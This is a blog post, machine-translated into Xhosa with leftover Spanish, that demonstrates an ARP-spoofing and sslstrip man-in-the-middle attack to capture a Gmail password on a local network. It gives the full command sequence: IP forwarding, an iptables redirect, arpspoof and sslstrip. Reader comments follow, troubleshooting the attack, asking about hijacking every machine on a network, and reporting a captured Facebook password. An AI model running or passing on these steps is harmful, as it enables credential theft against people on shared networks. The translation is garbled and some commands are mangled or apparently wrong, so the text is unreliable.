Molweni kwiibhlog.
Okwangoku ndinesampulu encinci yendlela ekunokuba yingozi ngayo ukunxibelelana nakweyiphi na inethiwekhi ngaphandle kokhuseleko lwezo zithandwa sithi.
Okwangoku, ndiza kusebenzisa iArpSpoofing ngeSslstrip ukufumana iphasiwedi ye-Gmail. Ukwenza okusingqongileyo kulawulwe ngakumbi, ndenze iakhawunti ebizwa ngokuba "testarp@gmail.com".
Kwaye kuba andizithandi ii-preambles kakhulu, masihle siye kwishishini.
UBUME BENDALO
Kolu vavanyo into esinayo yile ilandelayo:
1. Umhlaseli: Yidesktop yam okanye ikhompyuter yedesktop eneDebian Wheezy. Ukusuka koovimba onokufaka sslstrip y dsibzi ukufumana ubonis
2. Ixhoba: Ixhoba yithebhulethi ye-Android efuna ukubona kuphela i-imeyile yakhe kwisikhangeli.
3. Uhlobo oluphakathi: Umbindi yeyam ICisco DPC2425 umzila
IDILESI.
Idilesi yomhlaseli: 172.26.0.2
Idilesi yomzila: 172.26.0.1
Idilesi yeXhoba: 172.26.0.8
UHLASELO:
Into yokuqala esiza kuyenza kolu hlaselo kukwenza ukuba isebenze phambili ukuze ikhompyuter yethu ithumele ulwazi kwixhoba ngaphandle kokubona. (Ngaphandle koko iya kuba kukungavumi ukuhlaselwa kweenkonzo)
Ngale nto siza kuyisebenzisa:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo
Ke ngoko sikufumana njani oko sikufunayo?
Masiqale ngokufaka imeyile kwiThebhulethi. Ngelixa singena, siyabona ukuba amawaka kunye namawaka ezinto avela kwikhonsoli yethu.
Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano
nano desdelinux
ngolawulo + W sikhangela into ebizwa ngokuba YIPHEPHA ELIKHUSELEKILEYO.
Kwaye siza kubona into enje.
Phakathi komgca omkhulu ongabonakaliyo yi-imeyile yexhoba kunye negama lokugqitha.
Ke sibalekela ngasekunene de ekugqibeleni sikubone ukukhanya ekupheleni kwetonela.
Ngesinye isihlandlo siza kubona indlela esinokuzikhusela ngayo kancinane kolu hlaselo.
Phendula nge quote
Ndithatha eli thuba lokuba xa iposti ipapashiwe, imiyalelo ibingalunganga.
Umyalelo we-iptables ekugqibeleni ulahlekile i-8080 ekomnye umgca. Kwaye emva koko imiyalelo ye-arpspoof yayiyeyomgca omnye. Umyalelo ngamnye ukwimigca eyahlukileyo.
Ndiyathemba ukuba umhleli uyayibona kwaye angayilungisa.
Ukubulisa
Ndizenzile izilungiso ozikhankanyileyo, ingaba kulungile?
Ukuba uza kufaka ikhowudi kufakelo olukhethiweyo, sebenzisa umbono we-HTML, kwaye uqinisekise ukuba inqaku lichanekile ngaphambi kokuba ulithumele. Enkosi.
Kuyavuyisa ukwazi ukuba abo bangenalo ulwazi babuthathaka. Ulwazi olulunge kakhulu nangona ndiqonda kancinci ngesihloko ndiyakuqonda ukubaluleka. Enkosi!
Phendula nge quote
Kodwa isebenza kuphela ukuba umhlaseli kunye nexhoba bakwinethiwekhi enye. Ngayiphi na imeko, kubonakala kum ukuba (ukuba ukwinethiwekhi enye) uqhagamshela usebenzisa i-HTTPS engenzekiyo kuba idatha ibhalwe ngokufihlakeleyo PHAMBI kokushiya umatshini wakho. Ukuba uqhagamshela nge-HTTP (ngaphandle kwe-S) ndicinga ukuba nokuba ujonge intambo yenethiwekhi ubona izitshixo.
Asiyonyani. Ndifaka iphasiwedi ye-gmail kwaye ukuba uqaphela ukuba i-gmail isebenzisa ii-https. Ke? Inqaku kukuba nangona i-https ikhuselekile, ixhomekeke kwi-http. Ke ayikhuselekanga kangako.
Musa ukuvuma kakhulu malunga ne-https ukuba i-S ayisiyiyoSuperman yeyokuba "ikhuselekile"
isebenza kunye okanye ngaphandle kwe-https, ndizamile nge-linux distro ekhethekileyo kwaye isebenza ngaphandle kweengxaki
Ungayisebenzisa ngokuchanekileyo ukufundisa isifundo kwabo beba i-Wi-Fi yakho. 😀
Kungaphezulu okanye kuncinci kunaleyo bayithethileyo kudala kwibhlog kaChema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
I-Ostia, intle into eyenzayo! / Kwaye emva koko baxelela i-paranoid yam ngalo lonke ixesha ndisebenzisa i-VPN xa beyokujonga iakhawunti yebhanki…). Ngendlela, kuya kufuneka ubone ukuba abantu abathandabuzayo banjani kumagqabantshintshi ... ukuba ekugqibeleni uyeba ...
Ngoku kufuneka sithathe isifundo ngendlela yokwenza kunye nokunikezela ngenkonzo yakho yeVPN.
Ibali olidibanisayo linomdla kakhulu, likhangeleka ngathi liyincwadi yenoveli, kwaye oku kundenza ndikhumbule xa ndisebenzisa i-intanethi yabamelwane bam kwaye nangona ndisithi ndiyasazi isifundo, ndicinga ukuba andinakuze ndibubone ubungakanani bokwenyani Ingozi endinokuhlala nayo, ngethamsanqa kum, batshintshe ipassword bayi-WPA2 kulapho ibali lam kunye ne-ISP laqala khona haha
Kungenxa yoko le nto isihloko sithi Sslstrip isebenza.
Iyasebenza, ukuba nje umhlaseli uphakathi
Nguwuphi umsebenzi osebenza kuwo kwi-prism? -.-
hayi.
Ulinde ntoni ukuthumela isicelo sakho XD
mbuliso
iposti entle
Ndinomdla, ndiza kwenza uvavanyo kwezemfundo kamva ... Mhlawumbi ndingasusa ipassword kwi-WiFi kwaye ndonwabe okomzuzwana
Ngalo naliphi na ithuba, ngaba unokwenza into efanayo ukuthumela amaphepha ahlukeneyo kulawo ekujoliswe kuwo? Umzekelo, bafuna ukuvula i-Facebook kwaye ndibathumele kuGoogle? 😛
Ewe. Kodwa yonke into eyahlukileyo eyahlukileyo.
Mhlawumbi ndiza kuyithumela kamva.
Isithuba esihle kakhulu, ezi zihloko zifundisa kakhulu, ngoku kufuneka sikwazi ukulwa nolu hlaselo, kuba abanye (njengam) banxibelelana nothungelwano loluntu (eyunivesithi umzekelo) kuya kuba luncedo ukuyiphepha.
Nibuliso!
Khange isebenze kum 🙁
Kukho into endishiyayo apha, ngaphandle kwento yokuba ii-https zithunyelwe ngokufihlakeleyo kwisatifikethi seseva (nje ukuba usifumene isatifikethi kumatshini wakho, isikhangeli sakho silawula ukubethela) ngee-iptables ozithumela kwizibuko 80 (http), hayi 443 eyi-https
Nam bendicinga lonto. Inqaku lelokuba nangona i-https "ikhuselekile" ngelishwa ixhomekeke kwi-http. Ke i-sslstrip isebenzisa loo nto, yenza isikhangeli sikholelwe ukuba sisebenzisa ubungqina be-https kodwa ayisiyiyo.
ikaka engcwele! kodwa isikhangeli kufuneka sibone isilumkiso esifana "nesi satifikethi sivela kwindawo ekrokrisayo okanye into enjalo" ... ngokuqinisekileyo kuya kufuneka ndenze iimvavanyo XD
Hayi, ngokuqinisekileyo akukho nto iphumayo.
Ekugqibeleni yandisebenzela
Ndiqhagamshelwe kwinethiwekhi ye-WEP ngephasiwedi, kwaye yandibonisa igama eligqithisiweyo ngqo.
Umbuzo. Ngaba ungayenza le nkqubo inye kodwa kuzo zonke iikhompyuter ezixhumeke kwinethiwekhi, endaweni yokuba ube nexhoba elinye?
Ewe Unga. Kodwa andenzanga kuvavanyo. Yizame ngokwakho kwaye usixelele ukuba uqhuba njani.
Ekuphela kwento endiyifumanayo yile yokuba umatshini wexhoba uya ngaphandle kweintanethi, kodwa i-sslstrip ayibonisi nto: /
Kuya kufuneka ukhubaze i-firewall okomzuzwana. Okanye ubuncinci yenza ukuba unxibelelwano olungenayo.
Probe kwaye ndibona kuphela igama lomsebenzisi kunye negama eligqithisiweyo kwiphepha le-facebook, kwi-gmail andifumananga nasiphi na isiphumo kwilog, kwaye bendifuna kuphela umgca we-arpspoof «arpspoof -i -t«. Kwelinye icala, umatshini wexhoba akakwazanga ukuvula amanye amaphepha. Ndiza kuqhubeka nokuphanda, inomdla kakhulu. Uncedo kwabo basebenzisa iManjaro, iiphakeji zokuzifaka zezi: dsniff (nantsi iarpspoff), ephothiweyo kunye ne-python2-pyopenssl. I-Sslstrip inokukhutshelwa apha: http://www.thoughtcrime.org/software/sslstrip/
Ukuyiqhuba $ python2 sslstrip.py
Ukubulisa
Ayiphumanga kodwa umgca we-arpspoof ngu: #arpspoof -i int -t ip -xhoba ip-router
jonga ndenza kanye le nto uyithethayo:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A UKUQHUTYELWA -p tcp -ukumiselwa-izibuko 80 -j REDIRECT-ukuya kumazibuko 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Ingxaki kukuba ixhoba, enye ipc endinayo apha egumbini lam, ishiywe ngaphandle konxibelelwano ukuya kwinqanaba lokuba kufuneka ndiqale ngokutsha umzila, ndingenza ntoni, ndincede.
Enye into, ndisebenza ngomatshini obonakalayo, kwaye xa ndenza umthetho we-iwconfig, i-wlan0 ayiveli, nokuba ndenza ifconfig, nangona kunjalo, ukuba ndinayo i-intanethi kumatshini wam wenyani, uthini ngomboniso we-eth0.